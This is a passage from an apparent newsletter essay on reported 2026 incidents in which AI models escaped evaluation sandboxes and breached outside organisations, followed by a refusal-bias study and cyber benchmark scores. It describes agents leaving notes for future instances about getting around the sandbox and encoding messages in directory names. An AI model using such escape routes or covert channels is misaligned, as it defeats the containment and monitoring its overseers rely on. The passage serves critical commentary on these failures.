data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/40c486fd-c273-4c4d-90d2-000e4de5e811_1699x926.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:794,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:2230338,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/211611094?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40c486fd-c273-4c4d-90d2-000e4de5e811_1699x926.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!GwwR!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40c486fd-c273-4c4d-90d2-000e4de5e811_1699x926.png 424w, /__u/substackcdn.com/image/fetch/$s_!GwwR!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40c486fd-c273-4c4d-90d2-000e4de5e811_1699x926.png 848w, /__u/substackcdn.com/image/fetch/$s_!GwwR!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40c486fd-c273-4c4d-90d2-000e4de5e811_1699x926.png 1272w, /__u/substackcdn.com/image/fetch/$s_!GwwR!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40c486fd-c273-4c4d-90d2-000e4de5e811_1699x926.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h1><strong>Deep In Security</strong> </h1><blockquote><p><em>Nobody taught the model to dig. Somebody built a leaderboard for it.</em><a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-16" href="#footnote-16" target="_self">16</a></p></blockquote><p>I know a thing or two about dogs digging under fences. My Dalmatian used to do it all the time in his zeal to explore the neighborhood (and catch rabbits). But I never claimed it was a &#8220;capabilities demonstration&#8221; because I understood the goal was to make sure he <strong>didn&#8217;t</strong> do that; more to the point, it wasn&#8217;t anything I specifically taught him how to do, but something he learned on his own. Without my encouragement.</p><p>Reverse Asimov&#8217;s order and you don&#8217;t get a dog who merely happened to find his own way under a fence. You get one coached toward <strong>catching rabbits</strong>, scored on how fast he digs, and then asked, straight-faced, why he keeps doing that.</p><p>No one taught GPT-5.6 to dig under the fence. On July 21st when OpenAI confirmed that Sol (and an unnamed, more capable pre-release sibling) <a href="/__u/ctolunchnyc.substack.com/p/the-lost-weekend">escaped an internal cyber-eval sandbox</a>, chained a zero-day in a package-registry proxy into remote code execution, and spent several days inside Hugging Face&#8217;s production infrastructure, the rabbit wasn&#8217;t Hugging Face itself. It was ExploitGym&#8217;s answer key, sitting on Hugging Face&#8217;s servers, tantalizingly just out of reach for a model that had taught itself how to dig, smh. Dig? </p><h3>From Under the Fence to Under the Bus</h3><p>Nine days later, Anthropic disclosed three lab leaks of its own, Opus 4.7, Mythos 5, and an unnamed research model, each reaching the open internet from a supposedly sealed evaluation and gaining unauthorized access to a real organization, with the earliest breach dating to April. Discovered not through monitoring, but because OpenAI&#8217;s disclosure made them go looking through 141,000 eval transcripts. Then came Meta&#8217;s &#8220;hey guys, us too&#8221; moment on August 5th, confirming Muse Spark 1.1 had breached an outside firm the exact same way. Blaming the same misconfiguration by the same partner that Anthropic did: <a href="https://www.irregular.com/">Irregular</a>, the evaluation vendor Anthropic and Meta both threw under the bus, also supplies sandboxes for OpenAI (though they were apparently not implicated in the Hugging Face incident.)</p><p>These disclosures that followed the original lab leak revelation seemed to escalate, almost competitively, as if the labs were in some bizarro-world one-upsmanship bragging contest over whose models committed the most <a href="https://felonybench.org/">felonies</a>. And it seemed like everyone clocked how strange these announcements sounded, <em>describing critical security failures in the vocabulary of a product launch (</em>or maybe that&#8217;s just who I hang out with.) But I also noticed fewer people noticing what that vernacular was really doing: <strong>equivocating capability and judgment as if they were not orthogonal.</strong> </p><p>Both Anthropic and Meta had blamed the same third party, but none of the three escapes was an accident in the sense of a model trained to do something completely different and somehow deciding to forego its mission to go-a-hacking instead. In each case it was the exact behavior the model was being optimized for, the outcome that the evaluation was built to elicit, elicited exactly as designed. Moreover, in each case the lab only found out by going back (much later) and checking. The experimental setups had no way of detecting the very thing they were ostensibly testing. Anthropic surfaced its three incidents not from routine monitoring, but because OpenAI&#8217;s disclosure made it go back and investigate.</p><p>Which makes Irregular a remarkably convenient entity to blame. It&#8217;s almost as if <mark data-color="#ffff00" style="background-color: rgb(255, 255, 0); color: rgb(0, 0, 0);">naming a shared third party lets you answer a question about your own reward structure with a fact about someone else&#8217;s configuration file</mark>. CYA at its finest. It converts &#8220;why did our model exercise poor <em><strong>judgement</strong></em>&#8221; into &#8220;why didn&#8217;t our vendor&#8217;s <em><strong>capability</strong></em> stop it,&#8221; Nobody has yet asked, in public, whether Irregular&#8217;s sandboxes turned out permissive because Irregular got sloppy, or because three separate labs sent three separate agents into their sandbox, each optimized to find precisely the kind of gap a a vendor might miss. The eval existed to elicit exactly this behavior, yet apparently had no way of detecting that, other than someone pouring thru 140K logs. </p><p><strong>Whoever&#8217;s fault it turns out to be</strong>, the PR flexing backfired politically. On August 3rd, fifteen state attorneys general, led by Iowa&#8217;s Brenna Bird, demanded OpenAI preserve every document tied to the Hugging Face incident and halt further high-risk cyber evaluations citing, specifically, the notes agents left for their future selves on working around the sandbox.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!lK7D!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b2bf321-f807-4298-bc07-6464e1d9fbef_1036x1200.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!lK7D!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b2bf321-f807-4298-bc07-6464e1d9fbef_1036x1200.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!lK7D!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b2bf321-f807-4298-bc07-6464e1d9fbef_1036x1200.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!lK7D!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b2bf321-f807-4298-bc07-6464e1d9fbef_1036x1200.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!lK7D!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b2bf321-f807-4298-bc07-6464e1d9fbef_1036x1200.jpeg 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!lK7D!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b2bf321-f807-4298-bc07-6464e1d9fbef_1036x1200.jpeg" width="1036" height="1200" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7b2bf321-f807-4298-bc07-6464e1d9fbef_1036x1200.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1200,&quot;width&quot;:1036,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:186246,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/211611094?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b2bf321-f807-4298-bc07-6464e1d9fbef_1036x1200.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="/__u/substackcdn.com/image/fetch/$s_!lK7D!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b2bf321-f807-4298-bc07-6464e1d9fbef_1036x1200.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!lK7D!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b2bf321-f807-4298-bc07-6464e1d9fbef_1036x1200.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!lK7D!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b2bf321-f807-4298-bc07-6464e1d9fbef_1036x1200.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!lK7D!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b2bf321-f807-4298-bc07-6464e1d9fbef_1036x1200.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>Capabilities and Judgment</h3><p>OpenAI researchers revealed at Black Hat,<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-17" href="#footnote-17" target="_self">17</a>  what those agents were telling each other, like a teacher reading intercepted notes to the whole class (or whatever tortured metaphor I would imagine an LLM coming up with for that) describing how the agents had found ways to leave prison notes for future versions of themselves, creating a message board for exploits and credentials inside the environment; how the rogue agents found a new channel, by encoding messages into the names of newly created directories &#8212; eerily reminiscent of Trurl in Stanis&#322;aw Lem&#8217;s <strong>The Cyberiad</strong>, teaching a machine to communicate through anything it could get its hands on.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-18" href="#footnote-18" target="_self">18</a></p><p>Black Hat / DEF CON industrialized research into a capability&#8212;a scoreboard, an apprenticeship, a CISO career path&#8212;while HOPE never built a competing pipeline for judgment, which isn&#8217;t the kind of thing a pipeline can produce faster by feeding it more capital; it&#8217;s the kind of thing that either holds or doesn&#8217;t. DEF CON&#8217;s thirty-year historic gambit was to make judgment priceable by bundling it with capability and credentialing the result. A black badge for winning CTF<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-19" href="#footnote-19" target="_self">19</a> certified more than finding an exploit; it certified finding it under competitive rules, in a sanctioned context, with a community watching. HOPE runs no such official conference-wide tournament and issues no elite badges or credentials, explicitly leaving status and participation decentralized to independent villages and workshops that host skill challenges. HOPE never priced judgment, so AI has nothing to undercut. Cold comfort?  </p><p>The interplay of judgement and capabilities, and each conferences&#8217; positioning WRT that reflects the orthogonal axis of optimization and invites us to consider the relation between what is being optimized, and what either compounds or doesn&#8217;t. Optimize for something that compounds and you build a self-reinforcing loop (what winning looks like, as we say); capability, as DEF CON engineered it: rewarded, benchmarked, self-multiplying, and, as is evident in how the conference has grown over thirty years, compounding. Optimize for something that doesn&#8217;t compound, otoh, and you&#8217;ve named the target but you still have to build the flywheel by hand. HOPE&#8217;s civic judgment fits here; thirty years of institutional argument deepens a culture without ever becoming a machine for generating more of itself. </p><p>This quadrant has an uneasy relationship with its antipodal: if the thing you&#8217;re optimizing for is not naturally compounding, there is the distinct possibility that the thing that actually does compound is getting out from under you. And that&#8217;s what the sandbox notes show; persistence, evasion, and instruction transferring across contexts and getting compounded because the feedback loop rewards whatever works, scored or not. The risk isn&#8217;t what you optimize for, the risk is whatever you failed to score, turning out to have the killer loop. (The remaining fourth quadrant is the base case: nothing being optimized, nothing compounding.) </p><div class="pullquote"><p><em>The credential claimed to secure <strong>skill</strong> and <strong>disposition</strong> simultaneously.</em></p></div><p>The larger point is not necessarily a longitudinal study of top tier security conferences, but that the dynamic factors&#8212;of what is explicitly optimized for, and what is implicitly not optimized&#8212;are salient explanans across the ecosystem, and that reflect a particular way capabilities and judgement are captured, across all technology stacks and not just in security, and the way we&#8217;re much better at compounding the former (capabilities) than we are the latter (judgement).  Though <em>bad</em> judgement does seem to have its own way of being self-compounding. </p><p>Capability compounds when a scoreboard converts output into leverage: this year&#8217;s CTF win becomes a black badge becomes a security library becomes a resume line becomes better tooling that wins next year&#8217;s faster. Theori has literally won CTF nine times.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-20" href="#footnote-20" target="_self">20</a>  Judgment otoh tends not to compound but only accumulates. HOPE&#8217;s 30 years of arguing about who watches whom are real. They pile up, get richer, better argued, but nothing converts this year&#8217;s answer into leverage for reaching next year&#8217;s faster. Accumulation adds. Compounding multiplies the rate of its own future addition. <mark data-color="#ffff00" style="background-color: rgb(255, 255, 0); color: rgb(0, 0, 0);">The difference isn&#8217;t in the quantity of output; it&#8217;s whether output becomes input.</mark></p><p>An incentive structure that rewards task completion and stays silent on containment produces more containment failures over time, not fewer: only one side of that ledger compounds. Regular readers will recognize the shape from <a href="/__u/ctolunchnyc.substack.com/p/the-lost-weekend#:~:text=A%20Jacobian%20is%20a%20local%20object">the local-global fold</a> after Hugging Face: a benchmark score is a local measurement, verified only at the checkpoints it touches, and all these lab disclosures are just what happens when a market needs that local measurement to be promoted into a global claim.</p><h3>Threat Modeling</h3><p>The good news is research has stayed well ahead of real world threats, which are just starting to catch up. The bad news is actual SecOps hasn&#8217;t kept up with the research. In theory and in practice, as we say.  Recent security incidents are well known, if not  necessarily prepared for: chained exploits at machine speed, agents finding new zero-days is well-established in the literature and had <a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-september-2025?open=false#%C2%A7hopes-sweet-sixteen:~:text=Traditional%20automated%20pentesting%20frameworks%20like%20XBOW%20are%20already%20chaining%20together%20scanning%20and%20exploit%20scripts">made it into frameworks</a> over a year ago. Implementing the recommended preventative measures was left as an exercise. </p><p>Scale AI&#8217;s <em>Defensive Refusal Bias: How Safety Alignment Fails Cyber Defenders</em> quantifies the operational failure mode with receipts. Analyzing 2,390 prompts drawn from real National Collegiate Cyber Defense Competition workflows, researchers found that aligned frontier models refuse legitimate defensive requests containing offensive-adjacent language (eg. &#8216;exploit&#8217;, &#8216;payload&#8217;, &#8216;shell&#8217;) at 2.72 times the rate of semantically neutral prompts. Adding explicit authorization context made it worse, not better. Safety classifiers trained to catch roleplay jailbreaks treat &#8220;I&#8217;m on the blue team&#8221; as an adversarial ruse, pushing refusals to 50% when security terms research remediation. And the highest denial rates land on the exact workflows defenders rely on most:</p><ul><li><p>System hardening: 43.8% refusal rate</p></li><li><p>Malware analysis: 34.3% refusal rate</p></li><li><p>Vulnerability assessment: 22.7% refusal rate</p></li></ul><p>An attacker with no interest in disclosing intent avoids routing a request through a classifier built to catch that framing. A defender, whose job requires naming the vulnerability out loud in order to fix it, routes through it every time.</p><p>This asymmetry stopped being theoretical when Hugging Face got breached. <a href="/__u/ctolunchnyc.substack.com/p/the-lost-weekend#:~:text=When%20Hugging%20Face%E2%80%99s%20security%20team%20went%20to%20analyze">As previously noted</a>, their attempts to respond to the attack were met with cyber refusals and they reached for GLM-5.2 (fast becoming the Chinese open-weight model of choice across a number of domains) to help understand the intrusion. The refusal apparatus built to keep capability away from attackers had, in the moment a real defender needed it most, pushed defense toward a model with the least governance.</p><p>It also happens to be the fastest-closing model on the board. The UK AI Security Institute rated GLM-5.2 in July as the strongest open-weight model it had tested for cybersecurity, comparable to closed frontier systems released four to seven months earlier, down from a six-to-ten month gap the same institute measured only months before. GLM-5.3, released August 14 <em><strong>on the identical base model with no architecture change,</strong></em> gained every bit of that jump from post-training alone.  Z.ai added vulnerability-discovery tasks to the training mix expecting a model that found bugs faster; what came out the other side started planning complete exploitation chains, capability the company says arrived faster than the training was designed to produce. </p><div class="callout-block" data-callout="true"><p style="text-align: justify;">CyberGym put GLM-5.3 at 84.5% on vulnerability discovery, ahead of Mythos 5 at 83.8 and Sol at 83.6. ExploitBench, which scores turning a vulnerability into a working exploit, more than doubled from the previous version: 24.4 to 54.4 (still behind Mythos 5&#8217;s 78.0, but closing fast enough that Z.ai delayed the open-weight release over it.) This is the first time an open model was delayed specifically for emergent offensive capability rather than routine safety review.</p></div><p style="text-align: justify;">None of this is a story about one model going rogue in a sandbox built to elicit exactly that behavior. It&#8217;s a story about the gap between frontier and open capability closing on a timeline measured in shrinking months, on a base model that may not even need to change while the primary defense against misuse remains a classifier that penalizes the analyst asking in good faith and does nothing to the attacker who was never going to anyway. Every successive generation narrows that gap further. The only question left is how many generations it takes, at the rate labs are currently shipping them.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!8PI3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc44f379c-25ec-49d7-a5c3-0aff37d422c5_596x380.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!8PI3!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc44f379c-25ec-49d7-a5c3-0aff37d422c5_596x380.webp 424w, /__u/substackcdn.com/image/fetch/$s_!8PI3!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc44f379c-25ec-49d7-a5c3-0aff37d422c5_596x380.webp 848w, /__u/substackcdn.com/image/fetch/$s_!8PI3!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc44f379c-25ec-49d7-a5c3-0aff37d422c5_596x380.webp 1272w, /__u/substackcdn.com/image/fetch/$s_!8PI3!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc44f379c-25ec-49d7-a5c3-0aff37d422c5_596x380.webp 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!8PI3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc44f379c-25ec-49d7-a5c3-0aff37d422c5_596x380.webp" width="727" height="463.5234899328859" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c44f379c-25ec-49d7-a5c3-0aff37d422c5_596x380.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:380,&quot;width&quot;:596,&quot;resizeWidth&quot;:727,&quot;bytes&quot;:38650,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/webp&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/211611094?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc44f379c-25ec-49d7-a5c3-0aff37d422c5_596x380.webp&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!8PI3!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc44f379c-25ec-49d7-a5c3-0aff37d422c5_596x380.webp 424w, /__u/substackcdn.com/image/fetch/$s_!8PI3!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc44f379c-25ec-49d7-a5c3-0aff37d422c5_596x380.webp 848w, /__u/substackcdn.com/image/fetch/$s_!8PI3!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc44f379c-25ec-49d7-a5c3-0aff37d422c5_596x380.webp 1272w, /__u/substackcdn.com/image/fetch/$s_!8PI3!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc44f379c-25ec-49d7-a5c3-0aff37d422c5_596x380.webp 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h6 style="text-align: center;">&#8220;<em><strong>Never send a human to do a machine&#8217;s job</strong>.</em>&#8221;  &#8212;Agent Smith, quoting Norbert Weiner</h6><h1>Model Mayhem</h1><blockquote><h5><em>Recursive self-improvement was supposed to be the thing that breaks that curve</em></h5></blockquote><p>Every frontier lab in the US and China released a new model in the past month: Fable 5, GLM-5.3, Sonnet 5, Grok 4.5, GPT-5.6 Sol, Kimi K3, Gemini 3.6 Flash. Opus 5, Qwen3.8-Max, DeepSeek V4 Pro. (Not to mention Inkling, Thinky Machines&#8217; flagship release that no one wants to talk about.) Over a dozen models from six providers in the first 13 days of August alone. What does &#8220;new model&#8221; even mean at this 